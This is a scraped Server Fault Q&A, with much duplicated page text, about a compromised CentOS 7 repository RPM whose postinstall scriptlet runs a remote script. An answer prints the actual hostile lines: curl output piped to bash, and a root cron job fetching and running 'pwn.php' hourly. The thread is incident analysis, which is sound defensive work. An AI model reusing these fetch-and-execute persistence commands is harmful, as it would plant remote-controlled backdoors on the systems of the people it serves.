How did installing this RPM create a file?Strange cron job being executed on my serverHow do I warn people that a repo has been hacked?Problem with kde-filesystem when updatingReinstall file from RPM?How do I install an rpm that complains about rpmlib(FileDigests) <= 4.6.0-1?How to stop services in spec fileIs it legal to create an RPM which only runs %post scripts to modify a file owned by another RPM?YUM Update Errorsigning yum repository doesn't help passing the gpg check upon 'yum install'additional rpms to offline centos isoYum can't add rpm repository via yum install commandHow to extract rpm preamble
Automatically convert a number to use the correct SI unit prefix
Can 'leave' mean 'forget'?
Can I ask to speak to my future colleagues before accepting an offer?
How can I reduce the sound of rain on a range hood vent?
Can the passive "être + verbe" sometimes mean the past?
Can a single server be associated with multiple domains?
How can my story take place on Earth without referring to our existing cities and countries?
Is this hogweed?
Is it bad to describe a character long after their introduction?
Should I share with a new service provider a bill from its competitor?
Most importants new papers in computational complexity
When are digital copies of Switch games made available to play?
How can a valley surrounded by mountains be fertile and rainy?
Are there any features that help with the roll to avoid the destruction of a Wand of Fireballs when using the last charge?
Golf the smallest circle!
Why did this meteor appear cyan?
Why are 120 V general receptacle circuits limited to 20 A?
Most elegant way to write a one shot IF
Can a police officer film me on their personal device in my own home?
Why do the keys in the circle of fifths have the pattern of accidentals that they do?
What's the safest way to inform a new user of their password on my web site?
Meaning of もてり and use of が
Why won't the ground take my seed?
3D nonogram, beginner's edition
How did installing this RPM create a file?
Strange cron job being executed on my serverHow do I warn people that a repo has been hacked?Problem with kde-filesystem when updatingReinstall file from RPM?How do I install an rpm that complains about rpmlib(FileDigests) <= 4.6.0-1?How to stop services in spec fileIs it legal to create an RPM which only runs %post scripts to modify a file owned by another RPM?YUM Update Errorsigning yum repository doesn't help passing the gpg check upon 'yum install'additional rpms to offline centos isoYum can't add rpm repository via yum install commandHow to extract rpm preamble
.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty margin-bottom:0;
Running yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpm creates /etc/cron.d/sysstat2 but RPM disavows the file:
# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package
How did the RPM create the file and how do I see what else it did?
centos7 yum rpm
asked 8 hours ago
PascalPascal
1965 bronze badges
|
show 1 more comment
Running yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpm creates /etc/cron.d/sysstat2 but RPM disavows the file:
# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package
How did the RPM create the file and how do I see what else it did?
centos7 yum rpm
asked 8 hours ago
PascalPascal
1965 bronze badges
1
So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves?
– Aaron Copley
6 hours ago
The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form.
– Pascal
6 hours ago
And it's signed by them, too?
– Aaron Copley
6 hours ago
I don't know how to find that out.
– Pascal
6 hours ago
1
https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpmis the original file, it still has an old date in their repo, andgpgcheck=1is set in it.
– Pascal
6 hours ago
|
show 1 more comment
Running yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpm creates /etc/cron.d/sysstat2 but RPM disavows the file:
# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package
How did the RPM create the file and how do I see what else it did?
centos7 yum rpm
asked 8 hours ago
PascalPascal
1965 bronze badges
Running yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpm creates /etc/cron.d/sysstat2 but RPM disavows the file:
# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package
How did the RPM create the file and how do I see what else it did?
centos7 yum rpm
centos7 yum rpm
asked 8 hours ago
PascalPascal
1965 bronze badges
asked 8 hours ago
PascalPascal
1965 bronze badges
asked 8 hours ago
PascalPascal
1965 bronze badges
asked 8 hours ago
PascalPascal
1965 bronze badges
asked 8 hours ago
PascalPascal
1965 bronze badges
1965 bronze badges
1
So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves?
– Aaron Copley
6 hours ago
The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form.
– Pascal
6 hours ago
And it's signed by them, too?
– Aaron Copley
6 hours ago
I don't know how to find that out.
– Pascal
6 hours ago
1
https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpmis the original file, it still has an old date in their repo, andgpgcheck=1is set in it.
– Pascal
6 hours ago
|
show 1 more comment
1
So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves?
– Aaron Copley
6 hours ago
The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form.
– Pascal
6 hours ago
And it's signed by them, too?
– Aaron Copley
6 hours ago
I don't know how to find that out.
– Pascal
6 hours ago
1
https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpmis the original file, it still has an old date in their repo, andgpgcheck=1is set in it.
– Pascal
6 hours ago
1
1
So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves?
– Aaron Copley
6 hours ago
So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves?
– Aaron Copley
6 hours ago
The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form.
– Pascal
6 hours ago
The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form.
– Pascal
6 hours ago
And it's signed by them, too?
– Aaron Copley
6 hours ago
And it's signed by them, too?
– Aaron Copley
6 hours ago
I don't know how to find that out.
– Pascal
6 hours ago
I don't know how to find that out.
– Pascal
6 hours ago
1
1
https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpm is the original file, it still has an old date in their repo, and gpgcheck=1 is set in it.– Pascal
6 hours ago
https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpm is the original file, it still has an old date in their repo, and gpgcheck=1 is set in it.– Pascal
6 hours ago
|
show 1 more comment
2 Answers
2
active
oldest
votes
# rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1
https://www.getpagespeed.com/SCM/release-post-install.php contains:
#!/bin/bash
### hacked by rpowned
# bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2
answered 6 hours ago
PascalPascal
1965 bronze badges
add a comment |
You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.
rpm cannot completely track what happened because it is running an arbitrary script.
gpgcheck will not help you, both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:
$ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
pub 2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
sub 2048R/059A9010F4F3567D 2017-03-03
$ rpm -K getpagespeed-extras-*
getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.
It seems a bit paranoid to do the first install of software without Internet access, or manually inspect the "post install" script. But unfortunately almost seems necessary if packages do ill-advised tricks like this.
answered 4 hours ago
John MahowaldJohn Mahowald
11k1 gold badge7 silver badges14 bronze badges
The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.
– Pascal
4 hours ago
Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.
– Pascal
3 hours ago
add a comment |
Your Answer
StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "2"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);
else
createEditor();
);
function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: true,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: 10,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);
);
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fserverfault.com%2fquestions%2f972699%2fhow-did-installing-this-rpm-create-a-file%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
2 Answers
2
active
oldest
votes
2 Answers
2
active
oldest
votes
active
oldest
votes
active
oldest
votes
# rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1
https://www.getpagespeed.com/SCM/release-post-install.php contains:
#!/bin/bash
### hacked by rpowned
# bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2
answered 6 hours ago
PascalPascal
1965 bronze badges
add a comment |
# rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1
https://www.getpagespeed.com/SCM/release-post-install.php contains:
#!/bin/bash
### hacked by rpowned
# bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2
answered 6 hours ago
PascalPascal
1965 bronze badges
add a comment |
# rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1
https://www.getpagespeed.com/SCM/release-post-install.php contains:
#!/bin/bash
### hacked by rpowned
# bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2
answered 6 hours ago
PascalPascal
1965 bronze badges
# rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1
https://www.getpagespeed.com/SCM/release-post-install.php contains:
#!/bin/bash
### hacked by rpowned
# bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2
answered 6 hours ago
PascalPascal
1965 bronze badges
answered 6 hours ago
PascalPascal
1965 bronze badges
answered 6 hours ago
PascalPascal
1965 bronze badges
answered 6 hours ago
PascalPascal
1965 bronze badges
1965 bronze badges
add a comment |
add a comment |
You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.
rpm cannot completely track what happened because it is running an arbitrary script.
gpgcheck will not help you, both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:
$ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
pub 2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
sub 2048R/059A9010F4F3567D 2017-03-03
$ rpm -K getpagespeed-extras-*
getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.
It seems a bit paranoid to do the first install of software without Internet access, or manually inspect the "post install" script. But unfortunately almost seems necessary if packages do ill-advised tricks like this.
answered 4 hours ago
John MahowaldJohn Mahowald
11k1 gold badge7 silver badges14 bronze badges
The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.
– Pascal
4 hours ago
Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.
– Pascal
3 hours ago
add a comment |
You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.
rpm cannot completely track what happened because it is running an arbitrary script.
gpgcheck will not help you, both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:
$ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
pub 2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
sub 2048R/059A9010F4F3567D 2017-03-03
$ rpm -K getpagespeed-extras-*
getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.
It seems a bit paranoid to do the first install of software without Internet access, or manually inspect the "post install" script. But unfortunately almost seems necessary if packages do ill-advised tricks like this.
answered 4 hours ago
John MahowaldJohn Mahowald
11k1 gold badge7 silver badges14 bronze badges
The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.
– Pascal
4 hours ago
Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.
– Pascal
3 hours ago
add a comment |
You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.
rpm cannot completely track what happened because it is running an arbitrary script.
gpgcheck will not help you, both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:
$ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
pub 2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
sub 2048R/059A9010F4F3567D 2017-03-03
$ rpm -K getpagespeed-extras-*
getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.
It seems a bit paranoid to do the first install of software without Internet access, or manually inspect the "post install" script. But unfortunately almost seems necessary if packages do ill-advised tricks like this.
answered 4 hours ago
John MahowaldJohn Mahowald
11k1 gold badge7 silver badges14 bronze badges
You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.
rpm cannot completely track what happened because it is running an arbitrary script.
gpgcheck will not help you, both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:
$ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
pub 2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
sub 2048R/059A9010F4F3567D 2017-03-03
$ rpm -K getpagespeed-extras-*
getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.
It seems a bit paranoid to do the first install of software without Internet access, or manually inspect the "post install" script. But unfortunately almost seems necessary if packages do ill-advised tricks like this.
answered 4 hours ago
John MahowaldJohn Mahowald
11k1 gold badge7 silver badges14 bronze badges
answered 4 hours ago
John MahowaldJohn Mahowald
11k1 gold badge7 silver badges14 bronze badges
answered 4 hours ago
John MahowaldJohn Mahowald
11k1 gold badge7 silver badges14 bronze badges
answered 4 hours ago
John MahowaldJohn Mahowald
11k1 gold badge7 silver badges14 bronze badges
11k1 gold badge7 silver badges14 bronze badges
The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.
– Pascal
4 hours ago
Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.
– Pascal
3 hours ago
add a comment |
The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.
– Pascal
4 hours ago
Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.
– Pascal
3 hours ago
The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.
– Pascal
4 hours ago
The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.
– Pascal
4 hours ago
Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.
– Pascal
3 hours ago
Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.
– Pascal
3 hours ago
add a comment |
Thanks for contributing an answer to Server Fault!
- Please be sure to answer the question. Provide details and share your research!
But avoid …
- Asking for help, clarification, or responding to other answers.
- Making statements based on opinion; back them up with references or personal experience.
To learn more, see our tips on writing great answers.
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fserverfault.com%2fquestions%2f972699%2fhow-did-installing-this-rpm-create-a-file%23new-answer', 'question_page');
);
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
1
So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves?
– Aaron Copley
6 hours ago
The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form.
– Pascal
6 hours ago
And it's signed by them, too?
– Aaron Copley
6 hours ago
I don't know how to find that out.
– Pascal
6 hours ago
1
https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpmis the original file, it still has an old date in their repo, andgpgcheck=1is set in it.– Pascal
6 hours ago